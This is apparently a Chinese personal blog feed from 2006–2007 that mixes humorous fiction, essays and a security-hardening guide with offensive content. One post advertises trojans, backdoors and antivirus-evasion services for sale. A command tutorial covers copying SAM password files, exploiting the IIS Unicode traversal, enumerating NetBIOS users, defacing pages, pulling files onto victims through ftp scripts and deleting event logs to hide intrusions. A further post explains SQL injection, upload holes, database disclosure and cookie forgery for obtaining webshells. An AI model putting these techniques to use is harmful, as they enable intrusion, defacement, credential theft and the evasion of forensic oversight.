( Thu, 23 Aug 2007 13:55:35 +0800 )
Description:
我的新博客地址
新的邮箱
[email=huoqiang@vip.163.com]huoqiang@vip.163.com[/email] 可以通过这些方式联系到我! ( Sat, 11 Aug 2007 07:17:05 +0800 )
Description:
唐僧师徒四人正在往西天取经的路上走着,突然网上传来消息称:现在大唐国土上猪肉全线涨价,某些地方甚至已逼近虎肉的价格。一些心急的农户生怕赶不上这个赚钱的好机会,硬是把一些母猪也宰了,以卖个好价钱。
大家对于市场经济规律,已摸得**不离十了。猪肉正涨价时,你千万别心疼母猪。因为如果等你的母猪生出小猪再养大,估计那时又是供过于求,卖不回饲料钱了。这叫吃一堑长一智,前些年的便宜猪肉可不是白吃的。
打听到这个消息开始,八戒的头皮就一直发麻。虽说师傅悟空悟静都吃素,但人心隔肚皮,如果这猪肉越吃越少,甚至绝迹,自己身上这堆长了几千年的老肉,说不定便也成了稀世珍品,难免他人不起歹意。物以稀为贵,这也是市场规律之一。就像师傅唐三藏身上的肉,因为传闻吃后有长生不老之功效,使引得三界九天妖魔鬼神都动了贪念。小心,小心,千万小心提防!
仔细观察一番孙行者,八虚心里不禁犯了嘀咕:这些天,那猴头老拿眼睛瞅俺。时不时还从耳中掏出那个金箍棒,耍弄几下。有时却揪揪俺的耳朵,拂拂俺的皮毛,很贴心的样子,只怕不怀好意。这猴头什么时候对俺有过好感?什么时候善待过我?以前是轻则骂重则打,这些天突然和颜悦色起来,必是心怀鬼胎。只是这猴头精灵古怪之极,要以俺猪心度猴腹,却是有些难。再看沙悟静,还是一副忠厚老实的样子,但人不可貌相,海不可斗量,越是沉默寡言的人,越可能心怀叵测。这些天,沙僧和悟空常在一边窃窃私语,而后猴头驾着筋斗云不知哪里去了很长时间。回来后两人又暗笑不止。想必猴头又回大唐去作市场调查,更只怕那儿的肉价又上涨不少。哼哼,别以为被你们蒙在鼓里,你们绝想不到俺是大智若愚,扮猪吃虎。 还有师傅,依旧是端坐马上,念佛不止,一副心如止水的样子。师傅是最不性急的人,也是城府最深的人。他一副懒洋洋的样子,其实目标明确,手段凶险,最为可怕。他的绝招只有一个??:拖。随着时间越来越长,猪肉越来越少,俺老猪的价值越来越高。等到市场上猪肉卖尽时,他便要出手了。那时,什么经也不用取,只消把俺给带回大唐,呈到太宗皇帝面前,还有什么不能到手?可惜人算不如猪算,这点小聪明,也逃不过俺老猪的水泡眼。 时间一天天过去,眼看着悟空离开的次数越来越多,沙僧的眼神也越来越不怀好意,而师傅的念经声也越来越有气无力,甚至白龙马都好似已知道他们即将动手,走起路来也不那么自然了。这八戒的心病也越来越重。长此以往,这几百斤肉非交待在他们的手上不可。事不宜迟,走为上策。八戒偷偷写好辞职报告,惴惴不安地朝师傅走去。
唐僧见猪八戒走近前来,忙叫住道:“八戒,过来一下,有事与你商量。” 想吃我卖我就直说,还商量个啥?八戒心里这么想着,还是慢慢地蹭了过去,顺手拖上钉耙。 唐僧道:“此地距离西天,还有三五年的路程。你也知道,近来考察团的经费有些紧张,猴哥和悟静都在想办法……..”八戒想:“他们能想什么办法?还不是想把俺老猪给卖了?以为我不知道?”唐僧接着道:“悟空前几天到大唐各地农贸市场上考察了几回,发现猪肉价格上涨后,其他农产品的价格也跟着上涨。我们不吃猪肉没事,不吃素可不行。再这样下去,口袋里的钱,维持不了几天了。所以我和悟空悟静开了个考察团团务会议,就如何开源节流、用好经费问题,作出如下决定: 一、从即日起,每日只管早餐(一两稀饭,一个馒头)。其余伙食,自行设法解决。
二、为节省交通运输费开支,决定先辞退白龙马。背我上西天取经的任务,暂由你来负责。若他日物价平稳,经济状况有所好转,再考虚续聘白龙马事宜。 三、为防止坐吃山空,即日起悟空暂离考察团,回御马苑打工去,看马赚的钱贴补考察经费。路上降妖伏魔工作,由你主抓,沙僧配合。 四、大家的工资暂时不发,每月的通讯费津贴一律取消。你日后要往高老庄或嫦娥姐姐那儿打长途,请自掏腰包,团里不再报销。 五、以上四条为暂行规定。如果物价继续上涨,考察团再想其他办法来解决经费问题。到时能省的就再省点,能卖的就卖一些,总要保证按时赶到西天才是。”
八戒听得,心中很是气苦。想俺老猪这辈子为你们做猪做牛接下去还要做马,整日介装疯卖傻卖笑哄你们开心,搞得像那些小秘书一样十足是看门的狗干活的牛挨骂的猪,到头来有福你们享有难我来担,真是好人台下受气坏人台上唱戏,这是什么混账逻辑?
你们虽然不是现卖了俺老猪,却把俺视作山西省洪洞县砖窑里的黑工,丝毫不管吃为俺第一要务,却要俺只做不吃,还不发工资,心肠竟如此歹毒!更可恨的是竟然还想囤积居奇,坐等肉价再上,到时大发其财,真打得好算盘!哼哼,我现在就先结果了自己,让你们做白日发财梦去吧!俺这一走,青天在上,法网恢恢,上头自然有人会来查办你等,还怕你们逃了不成?于是,举起九齿钉耙,照着自己的天灵盖就这么一下。从此天下无猪。
只因肉价上涨,八戒竟落得如此下场!痛哉!!! ( Wed, 11 Jul 2007 11:13:58 +0800 )
Description: I have know elf i wrong really,I have asked you for help.I do ot want to hurt you really I am to love you very much originally,I hope that you ca give me a chance,I do ot have other egging for hopi ng that you ca forgive me,I am ot that erso that you imagine a olutely,Whether forgive me disregarding y ou or ot I all want to ay that one ound orry Final eing enitent qiang 2007.7.11 ( Sat, 30 Jun 2007 22:16:30 +0800 )
Description:
“***终结者”木马专杀工具
. 清除***终结者病毒;修复“映像劫持”;修复Autorun.inf;修复安全模式。
更新说明:
6月28日更新:
改善双核CPU下第一次点击保护按钮时可能比较慢的问题
6月22日更新:
1. 增加对毒霸的保护功能(需要***毒霸以后才能使用)
2. 增加自动升级功能
3. 增加用户崩溃信息收集功能
6月14日更新:
专杀增加功能:
1. 增加查杀***终结者新变种
2. 增加了部分新的病毒特征 ( Sat, 10 Mar 2007 22:17:28 +0800 )
Description: ( Sat, 10 Mar 2007 22:12:29 +0800 )
Description: ( Sat, 10 Mar 2007 22:11:38 +0800 )
Description: ( Sat, 10 Mar 2007 22:07:56 +0800 )
Description: ( Sat, 3 Feb 2007 21:04:58 +0800 )
Description:
本人提供程序破解.密码破解.3389远程桌面密码IP/
出售:木马,病毒,灰鸽子,后门程序等\ 出售超级免杀灰鸽子 下载者 捆绑器 网马 结巴 盗Q木马 承接木马免杀 去后门 网游木马定做 加密破解等业务 ( Sun, 24 Dec 2006 16:59:40 +0800 )
Description: ( Sat, 23 Dec 2006 23:28:21 +0800 )
Description:
---------------------- ---------------------- 下面就把127.0.0.1的数据库复制到本地C盘下 copy \\127.0.0.1\admin$\repair\sam._ c:\ 这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam ---------------------------------------------------------------------------------------------------------------------------
6:set 如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令! 下面是我得到的结果!我来分析它,只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTE***CE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-c HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible MSIE 5.0 Window 98 DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Ste ing 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET script_NAME=/scripts/..%2f../wi t/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_P ORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。 ---------------------------------------------------------------------------------------------------------------------------
7: tstat 如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧! 现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。 命令是 tstat -A XX.XX.XX.XX -A一定要大写哦。 这个我认为大不大写没有太大差别,用处还是一样的。
之后用net use \\对方IP 连接一下!
net view \\对方IP 查看对方共享文件夹
net u** *: \\IP\对方共享文件 映射对方共享文件夹成为本机的X盘
这就是139端口的基本用法!不过前提是必须对方开共享!
netstat -n看看谁连接你
-----------------
下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Statu --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Addre = 00-E0-29-14-35-BA PENTIUMII lt;00> UNIQUE PENTIUMII lt;20> UNIQUE ORAHOTOWN lt;00> GROUP ORAHOTOWN lt;1C> GROUP ORAHOTOWN lt;1B> UNIQUE PENTIUMII lt;03> UNIQUE INet~Service lt;1C> GROUP IS~PENTIUMII...00> UNIQUE ORAHOTOWN lt;1E> GROUP ORAHOTOWN lt;1D> UNIQUE ..__MSBROWSE__.01> GROUP 粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 lt;03> 的话,那他前面的就是用户. 这里的用户是PENTIUMII。 没有03说明:MAC没和IP捆在一起了
---------------------------------------------------------------------------------------------------------------------------
8:Shutdow 关了对方的NT服务器的命令 Shutdow \\IP地址 t:20 20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。 Telnet进去用命令或者是本地用什么软件重启对方电脑
shutdow -m \\计算机名称 可以远程重起或关闭的 --------------------------------------------------------------------------------
9:DIR 这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。 你可以本地试下。 --------------------------------------------------------------------------------
10:echo 著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。 我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。 -------------------------------------------------------
echo 南京大屠杀铁证如山,任何日本人不得抵赖!index.htm echo 南京大屠杀铁证如山,任何日本人不得抵赖!index.htm -------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。 第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。 -------------------------------------------------------
“”产生的内容将追加进文件中,“”则将原文件内容覆盖。 这里说明一下,和是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:\这个意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。
-------------------------------------------------------
大家可以本地试下。 可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。 1、首先,我们需要申请一个免费的主页空间。 2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。) ope upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的) cnhack(你申请时的用户名) test(你申请时的密码) get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm) bye(退出FTP对话,相当在98下的DO*,用**IT退出DOS) --------------------------------------------- 具体的做法: 输入 echo ope upload.chinaren.com> c:\cnhack.txt 输入 echo cnhack gt gt c:\cnhack.txt 输入 echo 39a gt gt c:\cnhack.txt 输入 echo get index.htm c:\inetpub\wwwroot\index.htm++c:\cnhack.txt 最后输入 ft -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。) 等命令完成时,文件已经下载到你指定的文件里了。 -----------------------
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。) 记得要 del c:\cnhack.txt --------------------------------------------------------------------------------
11:attri 这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。 attri -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 ---------------------- attri +r index.htm
这个命令是把index.htm的属性设置为只读。 ----------------------------------------
attrib这个命令先要用来查属性,比如attri 文件名,这样就显示出这个文件的属性了,它不止有R这个属性,其实一共有四种属性, a 档案属性 r 只读属性 h隐含属性 系统属性,我们想用哪个就用哪个,我觉得把我们上传的文件加个隐含属性更有意思,,,,,继续挑那贴的错.
---------------------------------------------------------------------------------------------------------------------------
12:del 当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。 NT的日志有这些 del C:\wi t\system32\logfiles\*.* del C:\wi t\ ytem32\config\*.evt del C:\wi t\system32\dtclog\*.* del C:\wi t\system32\*.log del C:\wi t\system32\*.txt del C:\wi t\*.txt del C:\wi t\*.log 只要删除这些就可以了。有些系统NT***在D盘或其他盘,就要把C改成其他盘。
Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msft vc1\,默认每天一个日志 Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志 Scheduler服务日志默认位置:%systemroot%\schedlgu.txt 以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。 Schedluler服务日志在注册表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent -------------------------------------------------------------------- del确实是删除文件用的,log也确实是日志文件类型,不过按上面这种方法是不可能清理掉你自身的日志的,因为系统自动运行着日志记录,你在做这些时它一直都在记录着,并没有停止,大家也会常看到,有时删除某个文件时会提示系统正在占用拒绝删除的,呵呵,这就明白了,系统正在运行的东西已经驻留内存里,当然不能这样删除掉了,大家怕了吧,这样删等于帮别人清理了日志,没删自己那份啊,哈哈哈哈,要问我怎么清理,我只说大家还是用小榕的工具来清吧,那个又快又好,我们何必去用那些烦琐的命令行呢,尤其对生长在windows桌面操作下的人们那显然是太麻烦了,我推荐小榕的elsave工具,清理日志又快又干净,还省电呢,嘻嘻,我可不是做广告来的。
-------------------------------------------------------------------------
借助第三方工具:如小榕的elsave.exe远程清除system,a licaton,security的软件,
使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \\i a /us
er: user
然后命令行下:elsave - \\i -l a licatio -C,这样就删除了安全日志。
其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。
--------------------------------------------------------------------------------
局域网要别人死机? 他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入
\\他的IP或机器名\c\con\co ( Sat, 23 Dec 2006 23:25:03 +0800 )
Description:
谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种: (1) 被他人盗取密码; (2) 系统被_blank/木马攻击; (3) 浏览网页时被恶意的java crpit程序攻击; (4) QQ被攻击或泄漏信息; (5) 病毒感染; (6) 系统存在漏洞使他人攻击自己。 (7) 黑客的恶意攻击。 下面我们就来看看通过什么样的手段来更有效的防范攻击。 查本地共享资源 删除共享 删除ipc$空连接 账号密码的安全原则 关闭自己的139端口 445端口的关闭 3389的关闭 4899的防范 常见端口的介绍 如何查看本机打开的端口和过滤 禁用服务 本地策略 本地安全策略 用户权限分配策略 终端服务配置 用户和组策略 防止rpc漏洞 自己动手DIY在本地策略的安全选项 工具介绍 避免被恶意代码 木马等病毒攻击 1.查看本地共享资源 运行CMD输入net hare,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。 2.删除共享(每次输入一个)
net hare admin$ /delete net hare c$ /delete net hare d$ /delete(如果有e,f,……可以继续删除) 3.删除ipc$空连接 在运行内输入regedit,在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1. 4.关闭自己的139端口,ipc和RPC漏洞存在于此。 关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。 5.防止rpc漏洞 打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。 XP SP2和2000 ro 4,均不存在该漏洞。 6.445端口的关闭 修改注册表,添加一个键值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为0这样就ok了。 7.3389的关闭 XP:我的电脑上点右键选属性——/远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。 Win2000server 开始——/程序——/管理工具——/服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用) 使用2000 ro的朋友注意,网络上有很多文章说在Win2000pro 开始——/设置——/控制面板——/管理工具——/服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services. 8.4899的防范 网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。 4899不象3389那样,是系统自带的服务。需要自己***,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。 所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。 9、禁用服务 若PC没有特殊用途,基于安全考虑,打开控制面板,进入管理工具——服务,关闭以下服务:
1.Alerter[通知选定的用户和计算机管理警报] 2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享] 3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享 4.Distributed Link Tracking Server[适用局域网分布式链接] 6.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息] 7.Me enger[警报] 8.NetMeeting Remote Deskto Sharing[netmeeting公司留下的客户信息收集] 9.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换] 10.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享] 11.Remote Deskto Hel Se io Manager[管理并控制远程协助] 12.Remote Registry[使远程计算机用户修改本地注册表] 13.Routing and Remote Acce [在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息] 14.Server[支持此计算机通过网络的文件、打印、和命名管道共享] 15.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享文件、打印和登录到网络] 16.Telnet[允许远程用户登录到此计算机并运行程序] 17.Terminal Services[允许用户以交互方式连接到远程计算机] 18.Window Image Acquisitio (WIA)[照相服务,应用与数码摄象机] 如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。 10、账号密码的安全原则 首先禁用guest帐号,将系统内建的administrator帐号改名~~(改的越复杂越好,最好改成中文的),然后设置一个密码,最好是8位以上字母数字符号组合。 (让那些该死的黑客慢慢猜去吧~) 如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置admi trator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置(关于密码安全设置,我上面已经讲了,这里不再罗嗦了。 打开管理工具。本地安全设置。密码策略
1.密码必须符合复杂要求性.启用 2.密码最小值.我设置的是8 3.密码最长使用期限.我是默认设置42天 4.密码最短使用期限0天 5.强制密码历史 记住0个密码 6.用可还原的_blank/加密来存储密码 禁用11、本地策略: 这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。 (虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的) 打开管理工具 找到本地安全设置。本地策略。审核策略
1.审核策略更改 成功失败 2.审核登陆事件 成功失败 3.审核对象访问 失败 4.审核跟踪过程 无审核 5.审核目录服务访问 失败 6.审核特权使用 失败 7.审核系统事件 成功失败 8.审核帐户登陆时间 成功失败 9.审核帐户管理 成功失败 am 然后再到管理工具找到 事件查看器 应用程序:右键/属性/设置日志大小上限,我设置了50mb,选择不覆盖事件 安全性:右键/属性/设置日志大小上限,我也是设置了50mb,选择不覆盖事件 系统:右键/属性/设置日志大小上限,我都是设置了50mb,选择不覆盖事件 12、本地安全策略: 打开管理工具 找到本地安全设置。本地策略。安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登陆的] 2.网络访问.不允许SAM帐户的匿名枚举 启用 3.网络访问.可匿名的共享 将后面的值删除 4.网络访问.可匿名的命名管道 将后面的值删除 5.网络访问.可远程访问的注册表路径 将后面的值删除 6.网络访问.可远程访问的注册表的子路径 将后面的值删除 7.网络访问.限制匿名访问命名管道和共享 8.帐户.(前面已经详细讲过拉 ) 13、用户权限分配策略: 打开管理工具 找到本地安全设置。本地策略。用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID 2.从远程系统强制关机,Admin帐户也删除,一个都不留 3.拒绝从网络访问这台计算机 将ID删除 4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务 5.通过远端强制关机。删掉 14、终端服务配置 打开管理工具 终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制 2.常规,加密级别,高,在使用标准Windows验证上点√! 3.网卡,将最多连接数上设置为0 4.高级,将里面的权限也删除.[我没设置] 再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话 15、用户和组策略 打开管理工具 计算机管理。本地用户和组。用户; 删除Su ort_388945a0用户等等只留下你更改好名字的adminisrator权限 计算机管理。本地用户和组。组 组。我们就不分组了,每必要把 ( Sat, 23 Dec 2006 23:19:29 +0800 )
Description:
入侵介绍: 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 1:上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。
怎样利用:在网站的地址栏中网址后加上/upfile.a 如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL
工具介绍:上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交
WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2。暴库:这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 http://www.xxx.com/di .a ?boardID=7&am ID=161 我门就可以把com/di 中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 co .a 如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c) 为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。
3。注入漏洞:这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。
怎样利用:我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/di .a ?boardID=7&am ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞,知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI NDSI 啊D DOMAIN等)都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。
4。旁注:我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。打个形象的比喻, 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站)
工具介绍:还是名小子的DOMIAN3.5不错的东西 ,可以检测注入 可以旁注 还可以上传!
5.COOKIE诈骗:许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。
怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码 (MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
今天的介绍就到这里了 比较基础,都是概念性的东西,所有的都是我的个人理解,如有不正确的地方希望大家指出(个人认为就是 为什么换成%5c 这里有点问题)。 ( Sun, 10 Dec 2006 10:26:28 +0800 )
Description:
美的事物总是让人难以忘怀。美,不一定要长久,也许有时那只是短暂的一瞬,却足以在你的脑际留下永久的印痕。
枫叶的摇落,是一种火焰的坠落,有悲壮之感;梧桐的飘零,飒飒于风中雨中,令人萌生感动;夕阳的坠落,是一种轻松的坠落,它抚起了明日的朝阳。虽说,这些瞬间的景色让人感到一丝凄凉,但它们散发的短暂光芒何尝不是一种绝美。
美,我们追求它是自然的,而并非刻意的装饰;大自然的美景,谁人不爱,又有谁可以掩盖它的风采,朝霞晚霞、日出日落、潮起潮落之所以那么美,只因它在瞬间放射出无尽的光辉,当你回过神时,它早已逝去,你可以看到下次的来临,却无法将这次的逝去挽留,更无法使美在片刻凝固。
事物尚且如此,生命又何尝不是这样?我们总是将新生命的诞生,看作是美,将生命的逝去,看作是痛。面对死亡,人总是心生恐惧,但人固有一死,或重于泰山、或轻于鸿毛,只要能在有限的生命中为人民做出无限的贡献,即使是英年早逝,又有何妨,因为你的美已经深深地烙在了人们的心坎上。烈士们那瞬间的逝去,不就铸造了永恒的灿烂吗?
那么,只要我们能把握生命中的美丽,铭刻那份永恒,并为报答那永恒的光辉尽力而为,也无须因为时间仓促而感叹人生。
让我们共同携手撒下美的种子,等待它静静地绽放,等待幸福悄悄地来临
美,一个多么生动而生活中处处都充满的华丽的字眼儿。美不但可以陶冶人的情操而且可以净化 人的心灵。生活中处处有美,有自然界的美,心灵美等等。 虽然我没有去过太多的地方,享受美的瞬间。可在我的肉眼中,我认为一个静寂的夜是最美的。虽曾看过日出,曾看到太阳在天空中编织出了美丽的舞蹈,瞧,她那婀娜多姿的舞姿,她受到了人们对她的赞扬,所以她咧开她的樱桃小嘴笑了。看她笑得多甜哪!
我刚从家中出来,到了天台,仰视天空,竟不知今夜的月光这般皎洁,瞧,天空中飞来了一群萤火虫,看那一闪一闪的小屁股 ,淘气的萤火虫在空中顽皮地跳跃着正偏偏起舞。“瞬间”一个表示时间短暂的词却让我们写出了那一瞬间的美。
那一夜,我等了好几个钟头,终于,我期盼已久的东西出现了,“狮子座”流星雨出现了。美,美,实在是美呀!恰巧我的星座也是狮子座的,这令我更加激动。就在那一瞬间,我许下了一个美丽而需要不断努力的愿望,那就是:此密不可泄漏。是不是很扫兴呀,不过不要紧,等我实现了再揭晓这个秘密。 温柔的夜风在眼前拂过,明天,该有一轮美丽的朝 ( Sun, 10 Dec 2006 10:21:27 +0800 )
Description:
感动生命的每一个瞬间 -------------------------------------------------------------------------------- 感动生命的每一个瞬间
